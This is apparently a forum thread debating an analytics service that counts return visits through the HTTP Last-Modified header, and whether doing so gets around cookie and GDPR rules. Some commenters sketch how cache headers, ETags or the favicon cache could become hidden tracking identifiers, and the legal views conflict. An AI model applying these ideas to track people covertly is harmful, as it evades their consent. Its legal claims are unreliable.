This blog post is just another cynical degredation of trust between users and their browsers, and browers and the servers they talk to. Just another part of HTTP that we can't use for what it was designed for anymore because servers want so desperately to track visitors uniquely and a significant subset of visitors would prefer not to be remembered uniquely.

slashdev · on Dec 2, 2022

It doesn't track visitors. It just counts how many came back and how many bounced. It's very privacy friendly, but still doesn't meet your standards? I think you just like to complain.

rcoveson · on Dec 3, 2022

This is simple. Why not use cookies? Because people don’t like cookies, or people delete cookies, or there are regulations surrounding cookies. So we’re doing what cookies are for with a different part of the protocol to circumvent all those issues.

Though, of course, it doesn’t circumvent any of them. Nobody who firmly rejects cookies is amused, and no court that ever made a cookie-consent law will shrug its shoulders and say “technically it’s not a cookie so I guess they’re in the clear”.

It’s ridiculous to call this privacy friendly, and I think you just like to track your users without asking.

slashdev · on Dec 4, 2022

It is privacy friendly and It's not tracking users. I think you like to complain about things you don't understand.

rcoveson · on Dec 4, 2022

Instead of putting a real, appropriate value in "last-modified", we're putting an arbitrary value, totally unrelated to actual response caching that the user's browser will unwittingly use next time it calls us and in so doing remind us of something about them. Maybe all it reminds us of is visit count, because we have restraint and that's all we're exploiting this for (for now). So now, for the third time:

Why not use a cookie?

The problem with this is encoded in the answer to that question. You're being willfully ignorant if you can't see that the answer to that question is: "Because I don't like certain governments, users, and user agents' way of handling cookies (e.g. deleting them, or requiring consent)".

slashdev · on Dec 4, 2022

So you agree it doesn't track users. At least we're on the same page there now.

Why not use a cookie? Because then they can't advertise that they don't use cookies. It's like how they put No-GMO label on food that doesn't even have GMO crop varieties. It's meaningless, but people are uneducated on the subject so it sells products.

You could use a cookie here, and you could do it completely legally without requiring consent. The laws don't care about cookies or other technical implementations, they care about tracking. So the reason to use this cache header instead of cookies is simply because people are uniformed on the subject and it sells better this way.

rcoveson · on Dec 5, 2022

> Why not use a cookie? Because then they can't advertise that they don't use cookies.

Oh, so they can be craven motherfuckers who abuse protocols for the sake of web analytics. With you so far.

> The laws don't care about cookies or other technical implementations, they care about tracking.

This is flat-out wrong. The law cares about any cookies that aren't strictly necessary for the site's operation. This very well might qualify as a cookie that isn't strictly necessary for the site's operation. It's not implemented as a cookie, but what you say is half right; "the laws don't care about... technical implementations". A judge might not care that you've come up with a clever way of storing your cookie with a different header. It's the same thing as a cookie, and it's not necessary for the site's operation.

slashdev · on Dec 5, 2022

Even the good guys are craven motherfuckers to you. Who does measure up to your standards of flawless perfection?

This is an analytics service that respects user privacy. We would be wishing them all the success in the world, not criticizing them for not meeting your ridiculous notions of HTTP header purity.

rcoveson · on Dec 5, 2022

What a ridiculous notion! Using cookies when you want to set a cookie! Absurd! What we are trying to do is set a cookie while also proclaiming to the world that we don’t use cookies. What’s the matter with that?

I’m sorry, but “I want to sort of lie” is just not a very compelling reason to me. I guess I just have ridiculously high standards.

ohbtvz · on Nov 30, 2022

No need for this kind of hyperbole. I wouldn't ask this question if the OP's post didn't contain grandiose claims such as "No cookies, no consent banners, no ad networks, 100% GDPR & CCPA compliant, low footprint web analytics." OP made a claim about their compliance with EU law. I'm asking for proof or at least an explanation.

jefftk · on Nov 30, 2022

The OP is a "privacy-first web analytics" company; this is totally something they should be asking their lawyers.

Note that their list the GDPR on their "Privacy law compliance" page (https://docs.withcabin.com/privacy.html) but not ePrivacy...

glenjamin · on Nov 30, 2022

I think the comments on this post would probably less hostile if the title said something like "detect the number of unique visitors", which is what I believe it's doing, rather than detecting unique visitors using unique timestamps, which is what many seem to be guessing based on the headline alone.

tedunangst · on Nov 30, 2022

Your personal visit count is embedded in the seconds.

lisper · on Nov 30, 2022

Yes, but not your identity.

michaelbuckbee · on Nov 30, 2022

They're using this to track number of unique visits from a single user to a site.

Thorrez · on Nov 30, 2022

Yes, but I think they're not tracking anything else about the user besides number of visits. E.g. they're not tracking ip I don't think.

And I think they are only doing it within a single day, not across days.

If you know that someone exists who visited your site 500 times today, but know nothing else about the person, is that a privacy problem?

andix · on Nov 30, 2022

It would be interesting if it is also possible to abuse it. If it is possible to create enough unique timestamps, that browsers still accept them. Can you add milliseconds to the TS, and do browsers store them too? Or do browsers also accept timestamps from months or years back and re-send them? If you can use the whole scale of Unix time (int32), there is a huge pool of entropy available.

In this case they don’t do this evil thing, and it probably would still violate the European GDPR, even if it’s not an actual cookie, but somebody has to find it first.

kapep · on Nov 30, 2022

Even without millisecond precision, you could embed multiple assets that are served with slightly different timestamps to encode a unique identifier.

jakobdabo · on Nov 30, 2022

ETag (paired with If-None-Match header sent by the browsers) is another caching header to be aware of.

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ET...

doomrobo · on Nov 30, 2022

Ooh that's kinda evil. A server could give a client a uniquely identifying ETag for a given URL. So whenever the client comes back on the same browser, they're identified.

Fortunately this is probably just as detectable as the Last-Modified abuse in the post.

bawolff · on Nov 30, 2022

There are a lot of things like that. Although browsers changed it recently, you also used to be able to use TLS session tickets.

Another one was the favicon cache.

Pretty much any state on the browser can be used to track people.

jahewson · on Nov 30, 2022

The fact that this is being used in an analytics product that claims to be compliant with all privacy laws is horrifying. There’s no way this is compliant and it’s deceptive.

pyrolistical · on Nov 30, 2022

Please explain why this isn’t compliant?

whartung · on Nov 30, 2022

Arguably this can become personally identifiable, much like a persons height of 7 feet becomes personally identifiable. How many 7 foot people live in Elko Nevada? (I have no idea, perhaps there's an entire colony of them.) But most very tall people, well, stand out. "You're that tall guy from Elko!"

Early on, it's not personally identifiable. No doubt there can be a lot of folks visiting the site only 10 times and never again.

But as someone continues to visit, they begin to narrow down who they are to "You're that guy that comes in here every day with a yellow hat". They may not "know" who you are but, they "know" who you are.

Eventually, there may be that one person that has the highest hit rate, who always stands out.

jefftk · on Nov 30, 2022

> there may be that one person that has the highest hit rate, who always stands out.

They could stop incrementing once they get to 10 (or something that's high but common enough to be shared by 1,000s of people).

Spivak · on Nov 30, 2022

> You're that guy that comes in here every day with a yellow hat

Yes but you have absolutely nothing at all to associate that back to a person. Where are you going to find the data "personal information of some kind of the people who visit your site a lot?" You're not collecting it.

jahewson · on Nov 30, 2022

See my reply to b34r. In addition assigning users into “anonymous” cohorts is a similar principle to FLoC which is likely not GDPR compliant https://searchengineland.com/googles-current-floc-tests-aren...

dahfizz · on Nov 30, 2022

> Processing personal data to generate the cohort assignment without the proper consent could also be a violation

Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?

bryant · on Nov 30, 2022

> Using personal data to assign a cohort counts as using personal data. Duh. The approach described in the article doesn't use any personal data, though?

Quoting the European commission:

"Personal data is any information that relates to an identified or identifiable living individual. Different pieces of information, which collected together can lead to the identification of a particular person, also constitute personal data."

I'd hazard a guess that it's the second part under which the EC might find this to be within scope.

dahfizz · on Nov 30, 2022

If I gave you a list of all the last-modified headers from a day, how would you use that information to identify a person?

ATsch · on Nov 30, 2022

The definition of personal data under the GDPR is anything that can be used to uniquely identify a natural person (with sufficiently high probability). Both cookies and date-modified meet that definition identically, as do IP addresses.

That doesn't mean you can't use it at all. It just places strong restrictions on what purpodes you can use it for. The important point is just that those restrictions are the same under GDPR for all of these technologies. It doesn't matter how you uniquely identify users, what matters is what you do with that information.

dahfizz · on Nov 30, 2022

They don't assign a unique date-modified to each user. They assign everyone the same date modified on their first visit of the day. I don't accept that this could be used to uniquely identify a natural person.

You may be able to look at the headers and see that a certain user made the most requests that day. That still tells you nothing about their identity.

mytailorisrich · on Nov 30, 2022

Nothing in the technique described here allows to identify an individual directly or indirectly because 'identifiers' are not unique and really no different than standard 'last-modified' dates. Even if they were unique further data would have to be collected in order to be able to identify individuals and turn everything into personal data.

What the technique may fall foul of, though, are cookie laws.

Spivak · on Nov 30, 2022

You can't just scare quotes anonymous without explaining how it could deanonymize you. You're sitting there with full access to the count data they collect. Use any statistical methods you like, figure out what visits were me.

tobr · on Nov 30, 2022

That seems very different, as those cohorts are based on actual personal data (correct me if I’ve misunderstood this about FLoC). That’s fundamentally different from a counter I think.

jahewson · on Nov 30, 2022

Yes that’s right, FLoC is explicitly using personal data. But now consider that that data is “you visited a gardening website in the past month” and compare it with “you visited this website 3 times yesterday” and the two methods don’t look so different.

tobr · on Nov 30, 2022

I guess we all have different instincts when it comes to this, but I find it much more expected and acceptable that a website can see that I’m returning, than that they get to know about random other interests I have based on my general browsing history.

mytailorisrich · on Nov 30, 2022

The article you quote does not suggest that "assigning users into “anonymous” cohorts is ... is likely not GDPR compliant" and I fail to see how that would be the case. Rather it seems to mention concerns that processing personal data to do so may be problematic.

bpfrh · on Nov 30, 2022

Because the GDPR isn't about any specific technology, but concerns any processing of personal data:

https://gdpr.eu/what-is-gdpr/

Edit: Huh, I stand corrected I don't know if this would count as personal data.

eurasiantiger · on Nov 30, 2022

Storing a cache header is not an issue, but if it is used as a unique identifier for user analytics purposes, it is almost certainly personally identifying information, at least after combining with other data. Since they are not disclosing that they store something they use to ID users, it is likely a GDPR violation, at least in spirit, and that spirit is exactly what GDPR seeks to control.

bonestamp2 · on Nov 30, 2022

> after combining with other data

The post says that they don't combine datapoints because that would negate privacy.

eurasiantiger · on Nov 30, 2022

They don’t but anyone using their service could.

ATsch · on Nov 30, 2022

It is personal data regardless of how it is used. The only question is if that use of personal data is permissive.

Using it for user analytics, which is neither required to run the service, nor in the users interest, nor reasonably expected by the user, is almost definitly illegitimate use.

XCSme · on Dec 2, 2022

I assume because it stores persistent data on the user's PC without consent (last-modified), just like a cookie.

erdos4d · on Nov 30, 2022

This is a form of data collection and tracking that is definitely against GDPR unless the user is informed of it and consents to it. As it stands, there is no such notification or consent. IANAL but I strongly suspect will get you fined in the EU.

pyrolistical · on Nov 30, 2022

What personal information is being collected here?

erdos4d · on Nov 30, 2022

GDPR doesn't just cover personal info, it also forbids tracking without consent, which includes cookies and other means. This is just a technical trick to track someone sans cookie, so I'm 100% certain they will fine anyone doing it unless they get consent.

LegionMammal978 · on Dec 1, 2022

The GDPR is entirely about personal data stored by the processor [0]. In principle, if the tracking is entirely client-side, and never produces any traces in how the client accesses your server, then the GDPR alone has no ability to stop it. (Not to say that it cannot run afoul of other regulations.) If the results of the tracking are somehow sent back to your server, then it most likely becomes personal data subject to the GDPR.

[0] https://gdpr-text.com/read/article-1/

b34r · on Nov 30, 2022

Why? It’s anonymous and doesn’t collect any user data other than IP and stuff from the user agent

jahewson · on Nov 30, 2022

It’s not anonymous in a low-entropy situation. A user can be indirectly identified. This would violate GDPR.

pyrolistical · on Nov 30, 2022

I don’t see how it can be used as described to identify an individual person.

Multiple requests end up with the same time stamp which means individuals are not traceable but as an aggregate countable

jahewson · on Nov 30, 2022

Only multiple requests within a given second get the same time stamp. So if you have less than 86k hits per day, then all your time stamps could be unique.

Edit: I misread the article here, where it said each visit incremented the counter by one second. So my calculation is not correct!

Thorrez · on Nov 30, 2022

No, they are truncating the timestamp to the day. So all visitors to the site on a specific day get the same initial timestamp.

jahewson · on Nov 30, 2022

Ah so they are, thanks! That’s much better. Though for a very, very low-traffic site this would still let me track unique visitors.

genewitch · on Nov 30, 2022

It is designed to track unique visitors, but not differentiate between them at all.

both you and i visit the same new site today, we both get a file our browser caches with today's date at 00:00:01. Tomorrow when we go to the same site, our browser says we got the file yesterday, so the server sends a new modified date to the browser, set to tomorrow's date at 00:00:02. Both of us have the same "new" file with the new modification date/time.

if i go back the following day, the only thing the server knows for certain, from just this header, is that i've visited twice before. So i'm not counted as a unique visitor.

That this could be used by assigning a unique timestamp to each visitor is where everyone's mind is going, and it feels like half are annoyed there's another way to leak information, and the other half are annoyed they didn't think of it prior to the end-of-year marketing bonus deadline.

Thorrez · on Dec 1, 2022

The technique could be used for a lot of tracking.

However, it sounds like they're using it just for quite minimal tracking. It sounds like the only thing they're tracking is how many people viewed the site how many times. They'll know that on a particular day, 1 person viewed the site 500 times, but won't know anything identifying about that person (e.g. IP, name, gender, any sort of unique ID).

dahfizz · on Nov 30, 2022

How do you go from timestamp to identifying someone?

~Every HTTP response has a Date field with a second-resolution timestamp that might be unique. Are you equally concerned about that?

bradstewart · on Nov 30, 2022

But how do I then tie that unique timestamp to an actual person? Which is what GDPR is concerned about.

(edit: spelling)

TylerE · on Nov 30, 2022

Birthday paradox means that will be far lower.

CaveTech · on Nov 30, 2022

No it wouldn't.

jahewson · on Nov 30, 2022

Yes it would because a unique time stamp allows me to indirectly identify a user.

kapep · on Nov 30, 2022

It is not a unique timestamp though. Each day, all visitors start at 00:00:00. All users that visit the site a second time get the timestamp 00:00:01 and so on.

CaveTech · on Nov 30, 2022

Where are people getting these insane reads of GDPR. Any bit of entropy is not going to violate GDPR. First, an active client-server connection is required for any kind supposed "identity" contained here, which would of course include far more unique bits of identity/entropy, such as IP. Secondly, even if the full DB of page view counts were leaked you could not actually use it to identify a user.

You have somehow perverted GDPR to believe it to mean `no client may ever hold a unique state`. Good luck to anyone making a claim that this is NOT possible in anything but the most rudimentary application.

SparkyMcUnicorn · on Nov 30, 2022

andix · on Nov 30, 2022

I agree. Well crafted laws (like the GDPR) forbid any kind of tracking without consent. It’s the what and not the how. It doesn’t matter if it’s via cookies or any other way.

Isinlor · on Nov 30, 2022

This is really no different than a cookie - basically the same mechanism from the view of the server just different semantics.

pornel · on Nov 30, 2022

Important to note that privacy laws that regulate tracking are not limited to the Cookie header. They apply to tracking and data collection in general, regardless of how technically clever you make it.

dvko · on Nov 30, 2022

This is part of why I quit my privacy focused analytics start-up years ago. I won’t name it directly, but it was one of the first and is still going strong (although not really open-source anymore).

People kept asking for cookieless tracking but with another way of identifying returning visitors that was always worse from a privacy standpoint. Cookies can be controlled by the client, anything stored on the server can not.

Honestly, cookies are pretty nice, it’s the law around this that sucks. Tricks that attempt to bypass the laws will surely only work for a limited time, at least I hope they will…

legitster · on Nov 30, 2022

If anything, this is worse.

Cookies have built in browser behavior - they have limited scope, the browser lets you see them, they get cleared out regularly.

Abusing metadata is way sketchier.

eurasiantiger · on Nov 30, 2022

Chances are they aren’t the first to come up with something like this. How can we detect this kind of metadata abuse?

fanso99 · on Nov 30, 2022

perhaps randomize minutes/seconds of the "last-modified" header.

notpushkin · on Nov 30, 2022

Or perhaps just drop minutes/seconds. And maybe don't store the date altogether for files that are small enough?

pavon · on Nov 30, 2022

Exactly. They could have the same functionality and privacy characteristics if they simply kept a cookie that incremented each time the site was visited. The fact that they didn't go this route suggests this is more about finding a way to track unique visitors when cookies are disabled. They are deliberately subverting the user's desire to not be tracked and spinning it as a privacy win.

dahfizz · on Nov 30, 2022

If it was about tracking users, wouldn't they generate a unique timestamp per visitor on the first visit? Giving everyone the same timestamp is a terrible way to try and track individuals.

geocar · on Nov 30, 2022

Well, yes you could have a cookie with C=C+1 and carefully set the expiration to the end of the day (like the article), or you could use randomly generated last-modified times and deduplicate server-side (similar to how cookies are usually used), but I can think of a few reasons the cache would give greater precision, so even if a lot of the same things are the same, I'm not so sure it's really "no different"; these things are pretty important to (some) publishers:

- third-party cookie blocking/notification features in browsers

- review processes on ad networks checking for actual cookies rather than suspicious last-modified times

ape4 · on Nov 30, 2022

Yes, cookies are a header field sent back by the browser and so is this.

habibur · on Nov 30, 2022

This can be used like a cookie without using cookies as long as definition of cookie stays "...a cookie is a small file stored on your computer".

You have 30 million seconds per year as unique identifier to be used against each individual for tracking. Even though the OP didn't do it.

Put an expire time in between 10 years back to today and 300m users tracked.

superjan · on Nov 30, 2022

On the other hand, now that we know about it is easy to defeat: a privacy conscious browser will just add a random amount of minutes/seconds in the “if modified since” header. The only risk is you sometimes trigger a reload because the resource was modified in that interval.

Kuinox · on Nov 30, 2022

It's harder, but you still leak bits of informations. If the random function is known, statical analysis can still leak out a bit of information.

a_c · on Nov 30, 2022

Looks like a nice middle ground between no tracking at all and needing all tracking to how well your website perform. Seems no fingerprinting is involved so the website visitor is anonymized. Unlike cookies where we can store whatever we like, this method reveal only the unique visit, and its derivatives.

legitster · on Nov 30, 2022

Am I missing something? Abusing the cache meta-data to store data on the user device seems much worse than a cookie.

I would have serious doubts of the longevity of such a trick, let alone some of the technical limitations I am sure the service has.

bonestamp2 · on Nov 30, 2022

The missing piece is that no fingerprint is involved. They don't have a way of identifying that user, but they are still able to count the number of times that visitor loads the page. So, it's not a tracker, it's a counter. It's like a loyalty punch card at your local sandwich shop -- they can track how many times you've been there by counting the hole punches, but they don't have a unique identifier, so they can't track details about those visits.

On the other hand, a cookie or a browser fingerprint contains info that can uniquely identify that user so it can be used for tracking.

legitster · on Nov 30, 2022

A cookie doesn't have to contain a fingerprint though.

In the same way, nothing in their current method necessarily says they couldn't find a way to insert a fingerprint here.

bonestamp2 · on Nov 30, 2022

Fair enough. At least they've told us how it works, so if the data no longer matches that methodology in the future then we can speculate that they've implanted a UID, unless they tell us how it works again and the data is consistent with the new methodology.

o_m · on Nov 30, 2022

Cookie tracking without consent is illegal in Europe, so it is a clever way to still do some basic web analytics.

roelschroeven · on Nov 30, 2022

Tracking without consent is illegal in Europe, regardless of the method. Alternative tracking methods are not workarounds to get around the law; they are only workarounds in trying not to be caught.

masklinn · on Nov 30, 2022

Tracking without consent is illegal. This is a clever way to get absolutely reamed, because you’re not only in breach of data protection laws you’re actively trying to obfuscate it.

andix · on Nov 30, 2022

The obfuscation part is probably irrelevant from a legal perspective.

atoav · on Nov 30, 2022

Yeah nice try. Law makers are not that stupid. Any way of storing personal data is subject to this regulation.

And before you try the next thing, personal data is everything that can be linked to a specific user, e.g. IP addresses have been ruled to be personal data, some uuid that helps you identify a user as well.

People should really read the law, and/or at least literate commentary on it instead of assuming things or repeating what someone else assumed.

mytailorisrich · on Nov 30, 2022

This is definitely not personal data. The piece of information is not linked to an individual and cannot be used to identify an individual (not the same as a 'user'), not least because it is not unique to each visitor: According to the article all first requests get the same 'last-modified' date, same for all second requests, etc.

Still, this stores data in the browser in a way that might be deemed a technology similar to a cookie, and therefore this might still fall within the various cookie laws, but this is completely outside of personal data regs.

tobr · on Nov 30, 2022

That’s pretty clever. I think if you really want to keep it privacy respecting, you should stop counting at 1 - so you can distinguish the first vs subsequent visits, but you can’t tell if someone has visited 2 or 200 times.

cortesoft · on Nov 30, 2022

I am having trouble understanding how knowing someone has visited three times is more privacy invasive than knowing they visited twice. What is so magical about 3?